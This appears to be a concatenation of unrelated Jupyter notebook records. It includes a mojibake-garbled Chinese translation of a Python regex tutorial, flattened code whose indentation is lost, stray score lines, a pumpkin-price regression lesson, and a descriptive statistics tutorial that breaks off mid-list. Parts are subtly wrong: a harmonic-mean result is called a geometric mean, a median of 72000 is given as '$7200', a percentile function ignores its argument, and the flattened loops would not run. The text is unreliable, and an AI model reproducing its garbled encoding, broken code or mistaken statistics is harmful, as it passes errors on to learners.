ๆดๅค็็ตๅญ้ฎไปถๅฐๅไบ๏ผ่ฝ็ถ่ฟไธๆฏๅ
จ้จ - ไฝ ่ฝไธพไพ่ฏดๆๅชไบ็ตๅญ้ฎไปถๅฐๅไธ่ฝๅน้
ๅฐๅ๏ผ๏ผ
่ฏ่
ๆณจ๏ผ`"[\w.]+"`ไธ้่ฆๅๆ`"[\w\.]+"`๏ผๅๅ ๆฏๅจๆญฃๅ่กจ่พพๅผ็ไธญๆฌๅทไธญ๏ผ้คไบ`^, -, ], \`่ฟๅ ไธช็ฌฆๅทไนๅค๏ผๆๆๅ
ถไป็็ฌฆๅท้ฝๆฒกๆ็นๆฎๅซไนใ
#### Parentheses indicate *groups* to extract
#### ไฝฟ็จๅฐๆฌๅท่ฟ่กๅ็ปๅน้
> For compound regular expressions like our email matcher, we often want to extract their components rather than the full match. This can be done using parentheses to *group* the results:
ๅฏนไบๅไธ้ข็็ตๅญ้ฎไปถๅฐๅๅน้
้ฃๆ ทๅคๆ็ๆญฃๅ่กจ่พพๅผๆฅ่ฏด๏ผๆไปฌ้ๅธธๅธๆๆๅไปไปฌ็้จๅๅ
ๅฎน่้ๅฎๅ
จๅน้
ใ่ฟๅฏไปฅไฝฟ็จๅฐๆฌๅท่ฟ่กๅ็ปๅน้
ๆฅๅฎๆ๏ผ
```
email3 = re.compile(r'([\w.]+)@(\w+)\.([a-z]{3})')
text = "To email Guido, try [email protected] or the older address [email protected]."
email3.findall(text)
```
> As we see, this grouping actually extracts a list of the sub-components of the email address.
ๆญฃๅฆ็ปๆๆ็คบ๏ผ่ฟไธชๅ็ปๅ็ๆญฃๅ่กจ่พพๅผๅฐ็ตๅญ้ฎไปถๅฐๅ็ๅไธช้จๅๅๅซๆๅไบๅบๆฅใ
> We can go a bit further and *name* the extracted components using the ``"(?P<name> )"`` syntax, in which case the groups can be extracted as a Python dictionary:
ๆด่ฟไธๆญฅ๏ผๆไปฌๅฏไปฅ็ปๆๅๅบๆฅ็ๅไธช้จๅ*ๅฝๅ*๏ผ่ฟๅฏไปฅ้่ฟไฝฟ็จ`"(?P<name>)"`็่ฏญๆณๅฎ็ฐ๏ผๅจ่ฟ็งๆ
ๅตไธ๏ผๅน้
็ๅ็ปๅฐไผๆๅๅฐPython็ๅญๅ
ธ็ปๆๅฝไธญ๏ผ
```
email4 = re.compile(r'(?P<user>[\w.]+)@(?P<domain>\w+)\.(?P<suffix>[a-z]{3})')
match = email4.match('[email protected]')
match.groupdict()
```
> Combining these ideas (as well as some of the powerful regexp syntax that we have not covered here) allows you to flexibly and quickly extract information from strings in Python.
ๆไธ่ฟฐ็ฅ่ฏ็ปๅ่ตทๆฅ๏ผๅ ไธ่ฟๆๅพๅคๆไปฌๆฒกๆไป็ป็ๅพๅผบๅคง็ๆญฃๅ่กจ่พพๅผ่ฏญๆณๅ่ฝ๏ผ่ฝ่ฎฉไฝ ่ฟ
้็ตๆดปๅฐไปๅญ็ฌฆไธฒไธญๆๅไฟกๆฏใ
### Further Resources on Regular Expressions
### ๆญฃๅ่กจ่พพๅผๆๅฑ้
่ฏป
> The above discussion is just a quick (and far from complete) treatment of this large topic.
If you'd like to learn more, I recommend the following resources:
> - [Python's ``re`` package Documentation](https://docs.python.org/3/library/re.html): I find that I promptly forget how to use regular expressions just about every time I use them. Now that I have the basics down, I have found this page to be an incredibly valuable resource to recall what each specific character or sequence means within a regular expression.
> - [Python's official regular expression HOWTO](https://docs.python.org/3/howto/regex.html): a more narrative approach to regular expressions in Python.
> - [Mastering Regular Expressions (OReilly, 2006)](http://shop.oreilly.com/product/9780596528126.do) is a 500+ page book on the subject. If you want a really complete treatment of this topic, this is the resource for you.
ไธ้ขๅฏนไบๆญฃๅ่กจ่พพๅผ็ไป็ปๅชๆฏไธไธชๅฟซ้็ๅ
ฅ้จ๏ผ่ฟ่ฟๆช่พพๅฐๅฎๆด็ไป็ป๏ผใๅฆๆไฝ ๅธๆๅญฆไน ๆดๅค็ๅ
ๅฎน๏ผไธ้ขๆฏไฝ่
ๆจ่็ไธไบ่ตๆบ๏ผ
- [Python็`re`ๆจกๅๆๆกฃ](https://docs.python.org/3/library/re.html): ๆฏๆฌกไฝ่
ๅฟ่ฎฐไบๅฆไฝไฝฟ็จๆญฃๅ่กจ่พพๅผๆถ้ฝไผๅปๆต่งๅฎใ
- [Pythonๅฎๆนๆญฃๅ่กจ่พพๅผHOWTO](https://docs.python.org/3/howto/regex.html): ๅฏนไบPythonๆญฃๅ่กจ่พพๅผๆดๅ ่ฏฆๅฐฝไป็ปใ
- [ๆๆกๆญฃๅ่กจ่พพๅผ(OReilly, 2006)](http://shop.oreilly.com/product/9780596528126.do) ๆฏไธๆฌ500ๅค้กต็ๆญฃๅ่กจ่พพๅผ็ไนฆ็ฑ๏ผไฝ ๅฆๆ้่ฆๅฎๅ
จไบ่งฃๆญฃๅ่กจ่พพๅผ็ๆนๆน้ข้ข๏ผ่ฟๆฏไธไธชไธ้็้ๆฉใ
> For some examples of string manipulation and regular expressions in action at a larger scale, see [Pandas: Labeled Column-oriented Data](15-Preview-of-Data-Science-Tools.ipynb#Pandas:-Labeled-Column-oriented-Data), where we look at applying these sorts of expressions across *tables* of string data within the Pandas package.
ๅฆๆ้่ฆๅญฆไน ๆดๅคๆๅ
ณๅญ็ฌฆไธฒๆไฝๅๆญฃๅ่กจ่พพๅผไฝฟ็จ็ไพๅญ๏ผๅฏไปฅๅ่ง[Pandas: ๆ ็ญพๅ็ๅๆฐๆฎ](15-Preview-of-Data-Science-Tools.ipynb#Pandas:-Labeled-Column-oriented-Data)๏ผ้ฃ้ๆไปฌไผๅฏนPandasไธ็่กจ็ถๆฐๆฎ่ฟ่กๅญ็ฌฆไธฒ็ๅค็ๅๆญฃๅ่กจ่พพๅผ็ๅบ็จใ
|
github_jupyter
|
x = 'a string'
y = "a string"
x == y
multiline = """
one
two
three
"""
fox = "tHe qUICk bROWn fOx."
fox.upper()
fox.lower()
fox.title()
fox.capitalize()
fox.swapcase()
line = ' this is the content '
line.strip()
line.rstrip()
line.lstrip()
num = "000000000000435"
num.strip('0')
line = "this is the content"
line.center(30)
line.ljust(30)
line.rjust(30)
'435'.rjust(10, '0')
'435'.zfill(10)
line = 'the quick brown fox jumped over a lazy dog'
line.find('fox')
line.index('fox')
line.find('bear')
line.index('bear')
line.rfind('a')
line.endswith('dog')
line.startswith('fox')
line.replace('brown', 'red')
line.replace('o', '--')
line.partition('fox')
line.split()
haiku = """matsushima-ya
aah matsushima-ya
matsushima-ya"""
haiku.splitlines()
'--'.join(['1', '2', '3'])
print("\n".join(['matsushima-ya', 'aah matsushima-ya', 'matsushima-ya']))
pi = 3.14159
str(pi)
"The value of pi is " + str(pi)
"The value of pi is {}".format(pi)
"""First letter: {0}. Last letter: {1}.""".format('A', 'Z')
"""First letter: {first}. Last letter: {last}.""".format(last='Z', first='A')
"pi = {0:.3f}".format(pi)
f"The value of pi is {pi}"
first = 'A'
last = 'Z'
f"First letter: {first}. Last letter: {last}."
f"pi = {pi:.3f}"
!ls *Python*.ipynb
import re
regex = re.compile('\s+')
regex.split(line)
for s in [" ", "abc ", " abc"]:
if regex.match(s):
print(repr(s), "matches")
else:
print(repr(s), "does not match")
line = 'the quick brown fox jumped over a lazy dog'
line.index('fox')
regex = re.compile('fox')
match = regex.search(line)
match.start()
line.replace('fox', 'BEAR')
regex.sub('BEAR', line)
email = re.compile('\w+@\w+\.[a-z]{3}')
text = "To email Guido, try [email protected] or the older address [email protected]."
email.findall(text)
email.sub('[email protected]', text)
email.findall('[email protected]')
regex = re.compile('ion')
regex.findall('Great Expectations')
. ^ $ * + ? { } [ ] \ | ( )
. ^ $ * + ? { } [ ] \ | ( )
regex = re.compile(r'\$')
regex.findall("the cost is $20")
print('a\tb\tc')
print(r'a\tb\tc')
regex = re.compile(r'\w\s\w')
regex.findall('the fox is 9 years old')
regex = re.compile('[aeiou]')
regex.split('consequential')
regex = re.compile('[A-Z][0-9]')
regex.findall('1043879, G2, H6')
regex = re.compile(r'\w{3}')
regex.findall('The quick brown fox')
regex = re.compile(r'\w+')
regex.findall('The quick brown fox')
email = re.compile(r'\w+@\w+\.[a-z]{3}')
email2 = re.compile(r'[\w.]+@\w+\.[a-z]{3}')
email2.findall('[email protected]')
email3 = re.compile(r'([\w.]+)@(\w+)\.([a-z]{3})')
text = "To email Guido, try [email protected] or the older address [email protected]."
email3.findall(text)
email4 = re.compile(r'(?P<user>[\w.]+)@(?P<domain>\w+)\.(?P<suffix>[a-z]{3})')
match = email4.match('[email protected]')
match.groupdict()
| 0.348202 | 0.987664 |
## Linear and Polynomial Regression for Pumpkin Pricing - Lesson 3
Load up required libraries and dataset. Convert the data to a dataframe containing a subset of the data:
- Only get pumpkins priced by the bushel
- Convert the date to a month
- Calculate the price to be an average of high and low prices
- Convert the price to reflect the pricing by bushel quantity
```
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
pumpkins = pd.read_csv('../../data/US-pumpkins.csv')
pumpkins.head()
from sklearn.preprocessing import LabelEncoder
pumpkins = pumpkins[pumpkins['Package'].str.contains('bushel', case=True, regex=True)]
new_columns = ['Package', 'Variety', 'City Name', 'Month', 'Low Price', 'High Price', 'Date']
pumpkins = pumpkins.drop([c for c in pumpkins.columns if c not in new_columns], axis=1)
price = (pumpkins['Low Price'] + pumpkins['High Price']) / 2
month = pd.DatetimeIndex(pumpkins['Date']).month
new_pumpkins = pd.DataFrame({'Month': month, 'Variety': pumpkins['Variety'], 'City': pumpkins['City Name'], 'Package': pumpkins['Package'], 'Low Price': pumpkins['Low Price'],'High Price': pumpkins['High Price'], 'Price': price})
new_pumpkins.loc[new_pumpkins['Package'].str.contains('1 1/9'), 'Price'] = price/1.1
new_pumpkins.loc[new_pumpkins['Package'].str.contains('1/2'), 'Price'] = price*2
new_pumpkins.iloc[:, 0:-1] = new_pumpkins.iloc[:, 0:-1].apply(LabelEncoder().fit_transform)
new_pumpkins.head()
```
A scatterplot reminds us that we only have month data from August through December. We probably need more data to be able to draw conclusions in a linear fashion.
```
import matplotlib.pyplot as plt
plt.scatter('Month','Price',data=new_pumpkins)
```
Try some different correlations
```
print(new_pumpkins['City'].corr(new_pumpkins['Price']))
print(new_pumpkins['Package'].corr(new_pumpkins['Price']))
```
Drop unused columns
```
new_pumpkins.dropna(inplace=True)
new_pumpkins.info()
```
Create a new dataframe
```
new_columns = ['Package', 'Price']
lin_pumpkins = new_pumpkins.drop([c for c in new_pumpkins.columns if c not in new_columns], axis='columns')
lin_pumpkins
```
Set X and y arrays to correspond to Package and Price
```
X = lin_pumpkins.values[:, :1]
y = lin_pumpkins.values[:, 1:2]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
lin_reg = LinearRegression()
lin_reg.fit(X_train,y_train)
pred = lin_reg.predict(X_test)
accuracy_score = lin_reg.score(X_train,y_train)
print('Model Accuracy: ', accuracy_score)
plt.scatter(X_test, y_test, color='black')
plt.plot(X_test, pred, color='blue', linewidth=3)
plt.xlabel('Package')
plt.ylabel('Price')
plt.show()
lin_reg.predict( np.array([ [2.75] ]) )
new_columns = ['Variety', 'Package', 'City', 'Month', 'Price']
poly_pumpkins = new_pumpkins.drop([c for c in new_pumpkins.columns if c not in new_columns], axis='columns')
poly_pumpkins
corr = poly_pumpkins.corr()
corr.style.background_gradient(cmap='coolwarm')
```
Select the Package/Price columns
```
X=poly_pumpkins.iloc[:,3:4].values
y=poly_pumpkins.iloc[:,4:5].values
```
Create Polynomial Regression model
```
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
pipeline = make_pipeline(PolynomialFeatures(4), LinearRegression())
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
pipeline.fit(np.array(X_train), y_train)
y_pred=pipeline.predict(X_test)
df = pd.DataFrame({'x': X_test[:,0], 'y': y_pred[:,0]})
df.sort_values(by='x',inplace = True)
points = pd.DataFrame(df).to_numpy()
plt.plot(points[:, 0], points[:, 1],color="blue", linewidth=3)
plt.xlabel('Package')
plt.ylabel('Price')
plt.scatter(X,y, color="black")
plt.show()
accuracy_score = pipeline.score(X_train,y_train)
print('Model Accuracy: ', accuracy_score)
pipeline.predict( np.array([ [2.75] ]) )
```
|
github_jupyter
|
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
pumpkins = pd.read_csv('../../data/US-pumpkins.csv')
pumpkins.head()
from sklearn.preprocessing import LabelEncoder
pumpkins = pumpkins[pumpkins['Package'].str.contains('bushel', case=True, regex=True)]
new_columns = ['Package', 'Variety', 'City Name', 'Month', 'Low Price', 'High Price', 'Date']
pumpkins = pumpkins.drop([c for c in pumpkins.columns if c not in new_columns], axis=1)
price = (pumpkins['Low Price'] + pumpkins['High Price']) / 2
month = pd.DatetimeIndex(pumpkins['Date']).month
new_pumpkins = pd.DataFrame({'Month': month, 'Variety': pumpkins['Variety'], 'City': pumpkins['City Name'], 'Package': pumpkins['Package'], 'Low Price': pumpkins['Low Price'],'High Price': pumpkins['High Price'], 'Price': price})
new_pumpkins.loc[new_pumpkins['Package'].str.contains('1 1/9'), 'Price'] = price/1.1
new_pumpkins.loc[new_pumpkins['Package'].str.contains('1/2'), 'Price'] = price*2
new_pumpkins.iloc[:, 0:-1] = new_pumpkins.iloc[:, 0:-1].apply(LabelEncoder().fit_transform)
new_pumpkins.head()
import matplotlib.pyplot as plt
plt.scatter('Month','Price',data=new_pumpkins)
print(new_pumpkins['City'].corr(new_pumpkins['Price']))
print(new_pumpkins['Package'].corr(new_pumpkins['Price']))
new_pumpkins.dropna(inplace=True)
new_pumpkins.info()
new_columns = ['Package', 'Price']
lin_pumpkins = new_pumpkins.drop([c for c in new_pumpkins.columns if c not in new_columns], axis='columns')
lin_pumpkins
X = lin_pumpkins.values[:, :1]
y = lin_pumpkins.values[:, 1:2]
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
lin_reg = LinearRegression()
lin_reg.fit(X_train,y_train)
pred = lin_reg.predict(X_test)
accuracy_score = lin_reg.score(X_train,y_train)
print('Model Accuracy: ', accuracy_score)
plt.scatter(X_test, y_test, color='black')
plt.plot(X_test, pred, color='blue', linewidth=3)
plt.xlabel('Package')
plt.ylabel('Price')
plt.show()
lin_reg.predict( np.array([ [2.75] ]) )
new_columns = ['Variety', 'Package', 'City', 'Month', 'Price']
poly_pumpkins = new_pumpkins.drop([c for c in new_pumpkins.columns if c not in new_columns], axis='columns')
poly_pumpkins
corr = poly_pumpkins.corr()
corr.style.background_gradient(cmap='coolwarm')
X=poly_pumpkins.iloc[:,3:4].values
y=poly_pumpkins.iloc[:,4:5].values
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
pipeline = make_pipeline(PolynomialFeatures(4), LinearRegression())
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
pipeline.fit(np.array(X_train), y_train)
y_pred=pipeline.predict(X_test)
df = pd.DataFrame({'x': X_test[:,0], 'y': y_pred[:,0]})
df.sort_values(by='x',inplace = True)
points = pd.DataFrame(df).to_numpy()
plt.plot(points[:, 0], points[:, 1],color="blue", linewidth=3)
plt.xlabel('Package')
plt.ylabel('Price')
plt.scatter(X,y, color="black")
plt.show()
accuracy_score = pipeline.score(X_train,y_train)
print('Model Accuracy: ', accuracy_score)
pipeline.predict( np.array([ [2.75] ]) )
| 0.544317 | 0.95253 |
# **Jupyter Notebook to demonstrate the basics of Descriptive Statistics**
Welcome to the notebook on descriptive statistics. Statistics is a very large field. People even go to grad school for it. For our site here, we will focus on some of the big hitters in statistics that make you a good data scientist.
Descriptive statistics are measurements that describe a population (or sample of that population) of values. They tell you where the center tends to be, how spread out the values are, the shape of the distribution, and a bunch of other things.
But here we focus on some of the simpler values that you have to know to consider yourself a newbie in data science.
The git repository for this notebook (and all notebooks) is found [here](https://github.com/eds-admin/eds-blog/blob/master/Statistics/Descriptive%20Statistics.ipynb).
### Useful resources:
* [Online Stat Book](http://onlinestatbook.com/)
* [Free books to learn Statistics](https://www.kdnuggets.com/2020/12/5-free-books-learn-statistics-data-science.html)
---
Author:
* dr.daniel benninger
History:
* v1, January 2022, dbe --- initial version for CAS BIA12
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Descriptive-Statistics" data-toc-modified-id="Descriptive-Statistics-1">Descriptive Statistics</a></span><ul class="toc-item"><li><span><a href="#Requirements" data-toc-modified-id="Requirements-1.1">Requirements</a></span></li><li><span><a href="#Useful-Python-functions" data-toc-modified-id="Useful-Python-functions-1.2">Useful Python functions</a></span><ul class="toc-item"><li><span><a href="#Random" data-toc-modified-id="Random-1.2.1">Random</a></span></li><li><span><a href="#len()-&-sum()" data-toc-modified-id="len()-&-sum()-1.2.2"><code>len()</code> & <code>sum()</code></a></span></li><li><span><a href="#max()-&-min()" data-toc-modified-id="max()-&-min()-1.2.3"><code>max()</code> & <code>min()</code></a></span></li><li><span><a href="#sorted()" data-toc-modified-id="sorted()-1.2.4"><code>sorted()</code></a></span></li></ul></li><li><span><a href="#The-Mean" data-toc-modified-id="The-Mean-1.3">The Mean</a></span><ul class="toc-item"><li><span><a href="#1.-Arithmetic-mean" data-toc-modified-id="1.-Arithmetic-mean-1.3.1">1. Arithmetic mean</a></span></li><li><span><a href="#2.-Geometric-mean" data-toc-modified-id="2.-Geometric-mean-1.3.2">2. Geometric mean</a></span></li><li><span><a href="#3.-Harmonic-mean" data-toc-modified-id="3.-Harmonic-mean-1.3.3">3. Harmonic mean</a></span></li></ul></li><li><span><a href="#The-Median" data-toc-modified-id="The-Median-1.4">The Median</a></span></li><li><span><a href="#The-Mode" data-toc-modified-id="The-Mode-1.5">The Mode</a></span></li><li><span><a href="#Percentiles" data-toc-modified-id="Percentiles-1.6">Percentiles</a></span></li><li><span><a href="#The-Boxplot" data-toc-modified-id="The-Boxplot-1.7">The Boxplot</a></span></li><li><span><a href="#Histogram" data-toc-modified-id="Histogram-1.8">Histogram</a></span></li><li><span><a href="#Variability" data-toc-modified-id="Variability-1.9">Variability</a></span><ul class="toc-item"><li><span><a href="#1.-Range" data-toc-modified-id="1.-Range-1.9.1">1. Range</a></span></li><li><span><a href="#2.-Inter-Quartile-Range" data-toc-modified-id="2.-Inter-Quartile-Range-1.9.2">2. Inter-Quartile Range</a></span></li><li><span><a href="#3.-Variance" data-toc-modified-id="3.-Variance-1.9.3">3. Variance</a></span></li></ul></li><li><span><a href="#Next-time" data-toc-modified-id="Next-time-1.10">Next time</a></span></li></ul></div>
## Requirements
We'll use two 3rd party Python libraries (*seaborn* and *pandas*) for displaying graphs.
Run from terminal or shell:
```
!pip install seaborn;
!pip install pandas
import seaborn as sns
import random as random
%matplotlib inline
```
## Useful Python functions
Many statistics require knowing the length or sum of your data. Let's chug through some useful [built-in functions](https://docs.python.org/3/library/functions.html).
### Random
We'll use the [`random` module](https://docs.python.org/3/library/random.html) a lot to generate random numbers to make fake datasets. The plain vanilla random generator will pull from a uniform distribution. There are also options to pull from other datasets. As we add more tools to our data science toolbox, we'll find that [NumPy's](https://docs.scipy.org/doc/numpy-1.13.0/index.html) random number generators to be more full-featured and play really nicely with [Pandas](https://pandas.pydata.org/), another key data science library. For now, we're going to avoid the overhead of learning another library and just use Python's standard library.
```
random.seed(42)
values = [random.randrange(1,1001,1) for _ in range(10000)]
values[0:15]
```
### `len()` & `sum()`
The building blocks of average. Self explanatory here.
```
len(values)
sum(values)
```
Below we'll use Seaborn to plot and visualize some of our data. Don't worry about this too much. Visualization, while important, is not the focus of this notebook.
See the *DEMO_SEABORN_Visualization_Examples.ipynb* notebook for a specific discussion of data visualization
```
sns.stripplot(x=values, jitter=True, alpha=0.2)
```
This graph is pretty cluttered. That makes sense because it's 10,000 values between 1 and 1,000. That tells us there should be an average of 10 entries for each value.
Let's make a sparse number line with just 200 values between 1 and 1000. There should be a lot more white space.
```
sparse_values = [random.randrange(1,1001) for _ in range (200)]
sns.stripplot(x=sparse_values, jitter=True)
```
### `max()` & `min()`
These built-in functions are useful for getting the range of our data, and just general inspection:
```
print("Max value: {}\nMin value: {}".format(
max(values), min(values)))
```
### `sorted()`
Another very important technique in wrangling data is sorting it. If we have a dataset of salaries, for example, and we want to see the 10 top earners, this is how we'd do it. Let's look now at the first 20 items in our sorted data set:
```
sorted_vals = sorted(values)
sorted_vals[0:20]
```
If we wanted to sort values in-place (as in, perform an action like `values = sorted(values)`), we would use the `list` class' own `sort()` method:
```python
values.sort()```
## The Mean
The mean is a fancy statistical way to say "average." You're all familiar with what average means. But mathemeticians like to be special and specific. There's not just one type of mean. In fact, we'll talk about 3 kinds of "means" that are all useful for different types of numbers.
1. **Arithmetic mean** for common numbers
2. **Geometric mean** for returns or growth
3. **Harmonic mean** for ratios and rates
### 1. Arithmetic mean
This is your typical average. You've used it all your life. It's simply the sum of the elements divided by the length. Intuitively, think of it as if you made every element the exact same value so that the sum of all values remains the same as before. What would that value be?
Mathematically the mean, denoted $\mu$, looks like:
$$\mu = \frac{x_1 + x_2 + \cdots + x_n}{n}$$
where $\bar{x}$ is our mean, $x_i$ is a value at the $i$th index of our list, and $n$ is the length of that list.
In Python, it's a simple operation combining two builtins we saw above: `sum()` and `len()`
```
def arithmetic_mean(vals):
return sum(vals) / len(vals)
arithmetic_mean(values)
```
From this we see our average value is 502.1696. Let's double check that with our intuitive definition using the sum:
```
avg_sum = len(values) * arithmetic_mean(values) #10,000 * 502.1696
print("{} =? {}".format(sum(values), avg_sum))
```
### 2. Geometric mean
The geometric mean is a similar idea but instead uses the product. It says if I multiply each value in our list together, what one value could I use instead to get the same result?
The geometric mean is very useful in things like growth or returns (e.g. stocks) because adding returns doesn't give us the ability to get returns over a longer length of time. In other words, if I have a stock growing at 5% per year, what will be the total returns after 5 years?
If you said 25%, you are wrong. It would be $1.05^5 - 1 \approx 27.63\%$
Mathematically, our geometric is:
$$ GM(x) = \sqrt[n]{x_1 \times x_2 \times \cdots \times x_n }$$
```
returns = [1.05, 1.06, .98, 1.08]
def product(vals):
'''
This is a function that will multiply every item in the list
together reducing it to a single number. The Pythonic way to
do this would be to use the 'reduce' function like so:
> reduce(lambda x, y: x * y, vals)
We are explicit here for clairty.
'''
prod = 1
for x in vals:
prod = prod * x
return prod
def geometric_mean(vals):
geo_mean = product(vals) ** (1/len(vals)) # raising to 1/n is the same as nth root
return geo_mean
geom = geometric_mean(returns)
geom
```
Using our `product` function above, we can easily multiply all the values together to get what your return after 4 years is:
```
product(returns)
```
or roughly $17.8\%$. Using our geometric mean should give us the same result:
```
geom**4
```
Now look at what happens with the arithmetic mean:
```
arm = arithmetic_mean(returns)
arm
arm**4
```
The arithmetic mean would tell us that after 4 years, we should have an $18.1\%$ return. But we know it should actually be a $17.8\%$ return. It can be tricky to know when to use the arithmetic and geometric means. You also must remember to add the $1$ to your returns or it will not mathematically play nice.
### 3. Harmonic mean
This one is also a bit tricky to get intuitively. Here we want an average of _rates_. Not to be confused with an average of _returns_. Recall a rate is simply a ratio between two quantities, like the price-to-earnings ratio of a stock or miles-per-hour of a car.
Let's take a look at the mph example. If I have a car who goes 60mph for 50 miles, 50mph for another 50, and 40mph for yet another 50, then the car has traveled 150 miles in $\frac{50mi}{60\frac{mi}{h}} + \frac{50mi}{50\frac{mi}{h}} + \frac{50mi}{40\frac{mi}{h}} = 3.08\bar{3}h$. This corresponds to a geometric mean of $150mi \div 3.08\bar{3}h \approx 48.648mph$. Much different from our arithmetic mean of 50mph.
(_Note: if in our example the car did not travel a clean 50 miles for every segment, we have to use a_ [weighted harmonic mean](https://en.wikipedia.org/wiki/Harmonic_mean#Weighted_harmonic_mean).)
Mathematically, the harmonic mean looks like this:
$$ \frac{n}{\frac{1}{x_1}+\frac{1}{x_2}+\cdots+\frac{1}{x_n}} $$
So let's code that up:
```
speeds = [60, 50, 40]
def harmonic_mean(vals):
sum_recip = sum(1/x for x in vals)
return len(vals) / sum_recip
harmonic_mean(speeds)
```
Now you know about the three [Pythagorean means](https://en.wikipedia.org/wiki/Pythagorean_means). Let's now move on to something very important in descriptive statistics:
## The Median
The median should be another familiar statistic, but often misquoted. When somebody is describing a set of numbers with just a mean, they might not be telling the whole story. For example, many sets of values are _skewed_ (a concept we will cover in the histogram section) in that most values are clustered around a certain area but have a long tail. Prices are usually good examples of this. Most wine is around \\$15-20, but we've all seen those super expensive bottles from a hermit's chateau in France. Salaries are also skewed (and politicians like to remind us how far skewed just 1\% of these people are).
A useful statistic in these cases is the "median." The median gives us the middle value, as opposed to the average value. Here's a simple, but illustrative example:
Suppose we take the salaries of 5 people at a bar
[12000, 48000, 72000, 160000, 3360000]
If I told you the average salary in this bar right now is \\$730,400, I'd be telling you the truth. But you can tell that our rich friend pulling in over 3 million is throwing off the curve. When he goes home early to do a business, the average drops to just \\$73,000. _A full 10 times less_.
The median instead in this case is much more consistent, or in other words, not as prone to _outliers._ To find the median, we simply take the middle value. Or if there are an even number of entries, we take the average of the two middle values. Here it is in Python:
```
salaries = [12000, 48000, 72000, 160000, 3360000]
def median(vals):
n = len(vals)
sorted_vals = sorted(vals)
midpoint = n // 2
if n % 2 == 1:
return sorted_vals[midpoint]
else:
return arithmetic_mean([sorted_vals[midpoint-1], sorted_vals[midpoint]])
median(salaries)
```
A much more reasonable \$7200! Now let's see what happens when Moneybags goes home:
```
median(salaries[:-1])
```
The median drops down to \\$60,000 (which is the average of \\$48,000 and \\$72,000).
Let's take a look at our original `values` list of 10,000 numbers.
```
median(values)
# Recall our values list is even, meaning 506.0 was both item 5000 and 5001
len(values)
# Lopping off the end returns the same value
median(values[:-1])
# Why? There are 9 506s in the list
from collections import Counter
c = Counter(values)
c[506]
```
Above we used the [`Counter`](https://docs.python.org/3.6/library/collections.html#collections.Counter) class in the standard library. This class is a subclass of the `dict` that holds a dictionary of keys to their counts. We can build our own version of it like so:
```
# Here we use the defaultdict that will initialize our first value if it doesn't yet exist
from collections import defaultdict
def make_counter(values):
counts = defaultdict(int)
for v in values:
counts[v] += 1
return counts
counts = make_counter([1, 2, 2, 3, 5, 6, 6, 6])
counts
```
Remember this part because it will show up very soon when we talk about histograms, *the chef's knife of a data scientist's data exploration kitchen*. But first, there's one more descriptive statistic that we should cover.
## The Mode
The mode is simply the most common element. If there are multiple elements with the same count, then there are two modes. If all elements have the same count, there are no modes. If the distribution is _continuous_ (meaning it can take uncountably infinite values, which we will discuss in the Distributions chapter), then we use ranges of values to determine the mode. Honestly, I don't really find the mode too useful. A good time to use it is if there's a lot of _categorical data_ (meaning values like "blue", "red", "green" instead of _numerical data_ like 1,2,3). You might want to know what color car your dealership has the most of.
Let's take a look at that example now. I've built a set of cars with up to 20 cars of any of four colors.
```
car_colors = ["red"] * random.randint(1,20) + \
["green"] * random.randint(1,20) + \
["blue"] * random.randint(1,20) + \
["black"] * random.randint(1,20)
car_colors
#Using our familiar counter
color_count = Counter(car_colors)
color_count
# We can see the mode above is 'blue' because we have 18. Let's verify:
def mode(counter):
# store a list of name:count tuples in case multiple modes
modes = [('',0)]
for k,v in counter.items():
highest_count = modes[0][1]
if v > highest_count:
modes = [(k,v)]
elif v == highest_count:
modes.append((k,v))
return modes
mode(color_count)
# If we have multiple modes?
mode(Counter(['blue']*3 + ['green']*3 + ['black']*2))
```
But that's enough about modes. Check out wikipedia if you want more because there's no point spending more time on them then they're worth.
Hang in there, because we're getting close. Still to come is Percentiles, Boxplots, and Histograms. Three very import things.
## Percentiles
A percentile is familiar to anyone who has taken the SAT. It answers the question: what percentage of students are dumber than I am? Well the College Board would love to tell you: congratulations, you're in the 92nd percentile!
Let's take a look at our old friend Mr. `values` with 10,000 numbers from 1-1000. Since this list is _uniformly distributed_, meaning every value is as likely to occur as any other, we expect that 25% of the numbers to be below 250, 50% to be below 500, and 75% to be below 750. Let's verify:
```
def percentile(vals, elem):
'''Returns the percent of numbers
below the index.
'''
count = 0
sorted_val = sorted(values)
for val in sorted_val:
if val > elem:
return count/len(values)
count += 1
for num in [250, 500, 750]:
print("Percentile for {}: {}%".format(num, percentile(values, num)*100))
```
Just like we'd expect. Now if the data set is not so nice and uniform, we expect these values to be quite different. Let's write a function to give us an element at a particular percentile:
```
from math import ceil
def pct_value(vals, pct):
sorted_vals = sorted(vals)
n = len(vals)
return sorted_vals[ceil(n*pct)]
for pct in [.25, .5, .75]:
print("Element at percentile {}%: {}".format(pct*100, pct_value(values, pct)))
```
Notice how the element at the 50th percentile is also our median! Now we have a second definition of the median.
Let's take a look now at a highly skewed set. It will range from 0-100 but we'll cluster it around 10
```
skewed = []
for i in range(1,100):
skewed += [i]*random.randint(0,int(4+i//abs(10.1-i)))
def print_statistics(vals, calc_mode=True):
print("Count: {}".format(len(vals)))
print("Mean: {:.2f}".format(arithmetic_mean(vals)))
print("Median: {}".format(median(vals)))
if calc_mode: print("Mode: {}".format(mode(Counter(vals))))
print("Max: {}".format(max(vals)))
print("Min: {}".format(min(vals)))
print("Range: {}".format(max(vals)-min(vals)))
for pct in [.25, .5, .75]:
print("{:.0f}th Percentile: {}".format(pct*100, pct_value(vals, pct)))
print("IQR: {}".format(pct_value(vals, 0.75) - pct_value(vals, 0.25)))
print_statistics(skewed)
```
A few clues that this distribution is skewed:
* The mean is significantly different from the median
* The percentiles cluster around 25. A uniform distribution we'd expect 25, 50, and 75 for our percentiles.
* The max i smuch higher than the mean, median, or even 75th percentile.
